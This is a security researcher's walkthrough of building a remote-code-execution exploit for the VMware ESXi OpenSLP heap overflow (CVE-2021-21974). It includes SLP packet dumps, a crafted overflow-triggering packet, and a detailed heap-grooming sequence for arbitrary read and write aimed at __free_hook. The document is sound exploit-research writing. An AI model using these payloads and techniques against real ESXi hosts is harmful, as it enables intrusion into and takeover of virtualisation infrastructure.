My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability

My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability

Original text by Johnny Yu (@straight_blast)

During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may be vulnerable to ESXi OpenSLP heap-overflow (CVE-2021–21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, who is the security researcher that found this bug. Lucas wrote a brief overview on how to exploit the vulnerability but share no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage fellow readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the founder’s perspective.

Setup

To setup a test environment, I need a vulnerable copy of VMware ESXi for testing and debugging. VMware offers trial version of ESXi for download. Setup is straight forward by deploying the image through VMware Fusion or similar tool. Once installation is completed, I used the web interface to enable SSH. To debug the ‘slpd’ binary on the server, I used gdbserver that comes with the image. To talk to the gdbserver, I used SSH local port forwarding:

ssh -L 1337:localhost:1337 root@<esxi-ip-address> 22

On the ESXi server, I attached gdbserver to ‘slpd’ as follow:

/etc/init.d/slpd restart ; sleep 1 ; gdbserver — attach localhost:1337 `ps | grep slpd | awk ‘{print $1}’`

Lastly, on my local gdb client, I connected to the gdbserver with the following command:

target remote localhost:1337

Service Location Protocol

The Service Location Protocol is a service discovery protocol that allows connecting devices to identify services that are available within the local area network by querying a directory server. This is similar to a person walking into a shopping center and looking at the directory listing to see what stores is in the mall. To keep this brief, a device can query about a service and its location by making a ‘service request’ and specifying the type of service it wants to look up with an URL.

For example, to look up the VMInfrastructure service from the directory server, the device will make a request with ‘service:VMwareInfrastructure’ as the URL. The server will respond back with something like ‘service:VMwareInfrastructure://localhost.localdomain’.

A device can also collect additional attributes and meta-data about a service by making an ‘attribute request’ supplying the same URL. Devices that want to be added to the directory can submit a ‘service registration’. This request will include information such as the IP of the device that is making the announcement, the type of service, and any meta-data that it wants to share. There are more functions the SLP can do, but the last message type I am interested in is the ‘directory agent advertisement’ because this is where the vulnerability is at. The ‘directory agent advertisement’ is a broadcast message sent by the server to let devices on the network know who to reach out if they wanted to query about a service and its location. To learn more about SLP, please see this and that.

SLP Packet Structure

While the layout of the SLP structure will be slightly different between different SLP message types, they generally follow a header + body format.

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = SrvRqst = 1)        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      length of <PRList>       |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <service-type>    |    <service-type> String      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |     <scope-list> String       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of predicate string   |  Service Request <predicate>  \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <SLP SPI> string   |       <SLP SPI> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.1)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x01\x00\x00=\x00\x00\x00\x00\x00\x00\x05\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of <PRList>:  0x0000
<PRList> String:  b''
length of <service-type>:  0x001c
<service-type> string:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of predicate string:  0x0000
Service Request <predicate>:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> String:  b''

[SLP Client-1] service request
[SLP Client-1] recv:  b'\x02\x02\x00\x00N\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x00\x00\x00\x01\x00\xff\xff\x004service:VMwareInfrastructure://localhost.localdomain\x00'

A ‘service registration’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = AttrRqst = 6)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       length of PRList        |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         length of URL         |              URL              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |      <scope-list> string      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <tag-list> string  |       <tag-list> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <SLP SPI> string  |        <SLP SPI> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-10.3)
  
[SLP Client-1] connect
 
Header:  bytearray(b'\x02\x06\x00\x00=\x00\x00\x00\x00\x00\x00\x0c\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of PRList:  0x0000
<PRList> String:  b''
length of URL:  0x001c
URL:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of <tag-list> string:  0x0000
<tag-list> string:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> string:  b''

[SLP Client-1] attribute request
[SLP Client-1] recv:  b'\x02\x07\x00\x00w\x00\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x00\x00b(product="VMware ESXi 6.7.0 build-14320388"),(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")\x00' 

Lastly, a ‘directory agent advertisement’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Service Location header (function = SrvReg = 3)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                          <URL-Entry>                          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | length of service type string |        <service-type>         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of attr-list string   |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of AttrAuths |(if present) Attribute Authentication Blocks...\
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.3)
 
      URL Entries
      
      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   Reserved    |          Lifetime             |   URL Length  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |URL len, contd.|            URL (variable length)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of URL auths |            Auth. blocks (if any)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-4.3)
  
[SLP Client-1] connect

Header:  bytearray(b'\x02\x03\x00\x003\x00\x00\x00\x00\x00\x00\x14\x00\x02en')
Body:  bytearray(b'\x00\x00x\x00\t127.0.0.1\x00\x00\x0bservice:AAA\x00\x07default\x00\x03BBB\x00')

<URL-Entry>: 

   Reserved:  0x00
   Lifetime:  0x0078
   URL Length:  0x0009
   URL (variable length):  b'127.0.0.1'
   # of URL auths:  0x00
   Auth. blocks (if any):  b''
   
length of service type string:  0x000b
<service-type>:  b'service:AAA'
length of <scope-list>:  0x0007
<scope-list>:  b'default'
length of attr-list string:  0x0003
<attr-list>:  b'BBB'
# of AttrAuths:  0x00
(if present) Attribute Authentication Blocks...:  b''

[SLP Client-1] service registration
[SLP Client-1] recv:  b'\x02\x05\x00\x00\x12\x00\x00\x00\x00\x00\x00\x14\x00\x02en\x00\x00'

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Service Location header (function = DAAdvert = 8)      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Error Code           |  DA Stateless Boot Timestamp  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |DA Stateless Boot Time,, contd.|         Length of URL         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     \                              URL                              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <attr-list>     |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    Length of <SLP SPI List>   |     <SLP SPI List> String     \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | # Auth Blocks |         Authentication block (if any)         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.5)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x08\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x02en')
Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
Length of <scope-list>:  0x0003
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

[SLP Client-1] directory agent advertisement
[SLP Client-1] recv:  b''

The Bug

As noted in Lucas’ blog, the bug is in the ‘SLPParseSrvURL’ function, which gets called when a ‘directory agent advertisement’ message is being process.

undefined4 SLPParseSrvUrl(int param_1,char *param_2,void **param_3)

{
  char cVar1;
  void **__ptr;
  char *pcVar2;
  char *pcVar3;
  void *pvVar4;
  char *pcVar5;
  char *__src;
  char *local_28;
  void **local_24;
  
  if (param_2 == (char *)0x0) {
    return 0x16;
  }
  *param_3 = (void *)0x0;
  __ptr = (void **)calloc(1,param_1 + 0x1d);                                       [1]
  if (__ptr == (void **)0x0) {
    return 0xc;
  }
  pcVar2 = strstr(param_2,":/");                                                   [2]
  if (pcVar2 == (char *)0x0) {
    free(__ptr);
    return 0x16;
  }
  pcVar5 = param_2 + param_1;
  memcpy((void *)((int)__ptr + 0x15),param_2,(size_t)(pcVar2 + -(int)param_2));    [3]

On line 18, the length of the URL is added with the number 0x1d to form the final size to ‘calloc’ from memory. On line 22, the ‘strstr’ function is called to seek the position of the substring “:/” within the URL. On line 28, the content of the URL before the substring “:/” will be copied into the newly ‘calloced’ memory from line 18.

Another thing to note is that the ‘strstr’ function will return 0 if the substring “:/” does not exists or if the function hits a null character.

I speculated VMware test case only tried ‘scopes’ with a length size below 256. If we look at the following ‘directory agent advertisement’ layout snippet, we see sample 1’s length of ‘scopes’ includes a null byte. This null byte accidentally acted as the string terminator for ‘URL’ since it sits right after it. If the length of ‘scopes’ is above 256, the hex representation of the length will not have a null byte (as in sample 2), and therefore the ‘strstr’ function will read passed the ‘URL’ and continue seeking the substring “:/” in ‘scopes’.

Sample 1 - won't trigger bug:

Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
****** Length of <scope-list>:  0x0003 ******
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Sample 2 - triggers the bug:

Body:  bytearray(b'\x00\x00`\xa4\x9a\x14\x00\x18AAAAAAAAAAAAAAAAAAAAAAAA\x02\x98BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a49a14
Length of URL:  0x0018
URL:  b'AAAAAAAAAAAAAAAAAAAAAAAA'
****** Length of <scope-list>:  0x0298 ******
<scope-list>:  b'BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Therefore, the ‘memcpy’ call will lead to a heap overflow because the source contains content from‘URL’ + part of ‘scopes’ while the destination only have spaces to fit ‘URL’.

SLP Objects

Here I will go over the relevant SLP components as they serve as the building blocks for exploitation.

_SLPDSocket

All client that connects to the ‘slpd’ daemon will create a ‘slpd-socket’ object on the heap. This object contains information on the current state of the connection, such as whether it is in a reading state or writing state. Other important information stored in this object includes the client’s IP address, the socket file descriptor in-use for the connection, pointers to ‘recv-buffer’ and ‘send-buffer’ for this specific connection, and pointers to ‘slpd-socket’ object created from prior and future established connections. The size of this object is fixed at 0xd0, and cannot be changed.

// https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/** Structure representing a socket
 */
typedef struct _SLPDSocket
{
   SLPListItem listitem;    
   sockfd_t fd;
   time_t age;    /* in seconds -- in unicast dgram sockets, this also drives the resend logic */
   int state;
   int can_send_mcast;  /*Instead of allocating outgoing sockets to for sending multicast messages, slpd
                          uses incoming unicast sockets that were bound to the network interface.  Unicast
                          sockets are used because some stacks use the multicast address as the source address
                          if the socket was bound to the multicast address.  Since we don't want to send
                          mcast out of all the unicast sockets, this flag is used*/

   /* addrs related to the socket */
   struct sockaddr_storage localaddr;
   struct sockaddr_storage peeraddr;
   struct sockaddr_storage mcastaddr;

   /* Incoming socket stuff */
   SLPBuffer recvbuf;
   SLPBuffer sendbuf;

   /* Outgoing socket stuff */
   int reconns; /*For stream sockets, this drives reconnect.  For unicast dgram sockets, this drives resend*/
   SLPList sendlist;
#if HAVE_POLL
   int fdsetnr;
#endif
} SLPDSocket;
memory layout for a _SLPDSocket object

_SLPBuffer

All SLP message types received from the server will create at least two SLPBuffer objects. One is called ‘recv-buffer’, which stores the data received by the server from the client. Since I can control the size of the data I send from the client, I can control the size of the ‘recv-buffer’. The other SLPBuffer object is called ‘send-buffer’. This buffer stores the data that will be send from the server to client. The ‘send-buffer’ have a fixed size of 0x598 and I cannot control its size. Furthermore, the SLPBuffer have meta-data properties that points to the starting, current, and ending position of said data.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/common/slp_buffer.h
/** Buffer object holds SLP messages.
 */
typedef struct _SLPBuffer
{
   SLPListItem listitem;   /*!< @brief Allows SLPBuffers to be linked. */
   size_t allocated;       /*!< @brief Allocated size of buffer. */
   uint8_t * start;        /*!< @brief Points to start of space. */
   uint8_t * curpos;       /*!< @brief @p start < @c @p curpos < @p end */
   uint8_t * end;          /*!< @brief Points to buffer limit. */
} * SLPBuffer;
memory layout for a _SLPBuffer object

SLP Socket State

The SLP Socket State defines the status for a particular connection. The state value is set in the _SLPSocket object. A connection will either be calling ‘recv’ or ‘send’ depending on the state of the socket.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/* Values representing a type or state of a socket */
#define SOCKET_PENDING_IO       100
#define SOCKET_LISTEN           0
#define SOCKET_CLOSE            1
#define DATAGRAM_UNICAST        2
#define DATAGRAM_MULTICAST      3
#define DATAGRAM_BROADCAST      4
#define STREAM_CONNECT_IDLE     5
#define STREAM_CONNECT_BLOCK    6   + SOCKET_PENDING_IO
#define STREAM_CONNECT_CLOSE    7   + SOCKET_PENDING_IO
#define STREAM_READ             8   + SOCKET_PENDING_IO
#define STREAM_READ_FIRST       9   + SOCKET_PENDING_IO
#define STREAM_WRITE            10  + SOCKET_PENDING_IO
#define STREAM_WRITE_FIRST      11  + SOCKET_PENDING_IO
#define STREAM_WRITE_WAIT       12  + SOCKET_PENDING_IO

states constants defined in OpenSLP source code

It is important to understand the properties of _SLPSocket, _SLPBuffer and Socket States because the exploitation process requires modifying those values.

Objectives, Expectations and Limitations

This section goes over objectives required to land a successful exploitation.

Objective 1

Achieve remote code execution by leveraging the heap overflow to overwrite the ‘__free_hook’ to point to shellcode or ROP chain.

Expectation 1

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘recv-buffer’ object, I can force incoming data to the server to be written to arbitrary memory location.

Objective 2

In order to know the address of ‘__free_hook’, I have to leak an address referencing the libc library.

Expectation 2

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘send-buffer’ object, I can force outgoing data from the server to read from arbitrary memory location.

Now that I defined goals and objectives, I have to identify any limitations with the heap overflow vector and memory allocation in general.

Limitations

  1. ‘URL’ data stored in the “Directory Agent Advertisement’s URL” object cannot contain null bytes (due to the ‘strstr’ function). This limitation prevents me from directly overwriting meta-data within an adjacent ‘_SLPDSocket’ or ‘_SLPBuffer’ object because I would have to supply an invalid size value for the objects’ heap header before reaching those properties.
  2. The ‘slpd’ binary allocates ‘_SLPDSocket’ and ‘_SLPBuffer’ objects with ‘calloc’. The ‘calloc’ call will zero out the allocated memory slot. This limitation removes all past data of a memory slot which could contain interesting pointers or stack addresses. This looks like a show stopper because if I was to overwrite a ‘position’ pointer in a _SLPBuffer, I would need to know a valid address value. Since I don’t know such value, the next best thing I can do is partially overwrite a ‘position’ pointer to at least get me in a valid address range that could be meaningful. With ‘calloc’ zeroing everything out, I lose that opportunity.

Fortunately, not all is lost. As shared in Lucas’ blog post, I can still get around the limitations.

Limitations Bypass

  1. Use the heap overflow to partially overwrite the adjacent free memory chunk’s size to extend it. By extending the free chunk, I can have it position to overlap with its neighbor ‘_SLPDSocket’ or ‘_SLPBuffer’ object. When I allocate memory that occupies the extended free space, I can overwrite the object’s properties.
  2. The ‘calloc’ call will retain past data of a memory slot if it was previously marked as ‘IS_MAPPED’ when it was still freed. The key thing is the ‘calloc’ call must request a chunk size that is an exact size as the freed slot with ‘IS_MAPPED’ flag enabled to preserve its old data. If a ‘IS_MAPPED’ freed chunk is splitted up by a ‘calloc’ request, the ‘calloc’ will service a chunk without the ‘IS_MAPPED’ flag and zero out the slot’s content.

There is still one more catch. Even if I can mark arbitrary position to store or read data for the _SLPBuffer, the ‘slpd’ binary will not comply unless associated socket state is set to the proper status. Therefore, the heap overflow will also have to overwrite the associated _SLPDSocket object’s meta-data in order to get arbitrary read and write primitive to work.

Heap Grooming

This sections goes over the heap grooming strategy to achieve the following:

The Building Blocks

Before I go over the heap grooming design, I want to say a few words about the purpose of the SLP messages mentioned earlier in fitting into the exploitation process.

service request — primarily use for creating a consecutive heap layout and holes.

directory agent advertisement — use to trigger the heap overflow vector to overwrite into the next neighbor memory block.

service registration — store user controlled data into the memory database which will be retrieved through the ‘attribute request’ message. This message is solely to set up ‘attribute request’ and is not used for the purpose of heap grooming.

attribute request — pull user controlled data from the memory database. Its purpose is to create a ‘marker’ that can be used to identify current position during the information leak stage. Also, the dynamic memory use to store the user controlled data can be a good stack pivot spot with complete user controllable content.

Overwrite _SLPBuffer ‘send-buffer’ object (Arbitrary Read Primitive)

(1). Client A, B, and C create connections to server. Client A sends ‘service request’ message. Client D creates connection and sends ‘service request’ message. Client B sends ‘service request’ message.
(2). Close client D’s connection.
(3). Client E creates a connection and sends an ‘attribute request’ message.
(4). Client E’s ‘send-buffer’ will go through reallocation because the data is too large.
(5). Client E’s connection is still intact and not closed, however, the ‘message’ object is now freed.
(6). Client G and H creates connection to server. Client C will now send a ‘service request’ to fill the hole left by Client E’s ‘send-buffer’ reallocation and freed ‘message’.
(7). Close client B’s connection.
(8). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x120. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client G sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client G’s ‘recv-buffer’ object. This object overlaps with client E’s ‘send-buffer’, which can now overwrite the ‘position’ pointers in it.
(11). Client J creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(12). Close client A’s connection.
(13). Client I creates connection to server and sends a ‘directory agent advertisement’ message.
(14). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client I. It can be observed that all objects related to client I are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(15). Client H’s sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client H’s ‘recv-buffer’ object. This object overlaps with client E’s ‘slpd-socket’, which can now overwrite the properties in it.

Overwrite _SLPBuffer ‘recv-buffer’ object (Arbitrary Write Primitive)

(1). Client A creates connection to server and sends ‘service request’ message. Client B creates connection only. Client C creates connection and sends ‘service request’ message. Client B now sends ‘service request’ message. Client D and E create connections to server.
(2). Close client C’s connection.
(3). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(4). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(5). Client E sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client E’s ‘recv-buffer’ object. This object overlaps with client B’s ‘recv-buffer’, which can now overwrite the ‘position’ pointers in it.
(6). Client G creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(7). Close client A’s connection.
(8). Client H creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extends its neighboring freed chunk from 0x100 to 0x140. The server will free the allocated object initiated by client H. It can be observed that all objects related to client H are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client D sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client D’s ‘recv-buffer’ object. This object overlaps with client B’s ‘slpd-socket’, which can now overwrite the properties in it.

The above visual heap layouts is created with villoc.

Exploitation Strategy Walkthrough

It is best to look at the exploit code along with following the below narration to understand how the exploit works.

  1. Client 1 sends a ‘directory agent advertisement’ request to prepare for any unexpected memory allocation that may happen for this particular request. I observed the request makes additional memory allocation when the ‘slpd’ daemon is run on startup but does not when running it through /etc/init.d/slpd start. Any unexpected memory allocation would eventually be freed and end up on the freelist. The assumptions is these unique freed slots will be used again by future ‘directory agent advertisement’ messages as long as I do not explicitly allocate memory that would hijack them.
  2. Clients 2–5 makes a ‘service request’ with each receiving buffer having a size of 0x40. This is to fill up some initial freed slots that exists on the freelist. If i don’t occupy these freed slot, it would hijack future ‘URL’ memory allocation for future ‘directory agent advertisement’ message and ruin the heap grooming.
  3. Clients 6–10 sets up client 7 to send the ‘service registration’ message to the server. The server only accepts ‘service registration’ message originating from localhost, therefore client 7’s ‘slpd-socket’ needs to be overwritten to have its IP address updated. Once the message is sent, client 7’s socket object will be updated again to hold the listening file descriptor to handle future incoming connection. If this step is skipped, future clients cannot establish connection with the server.
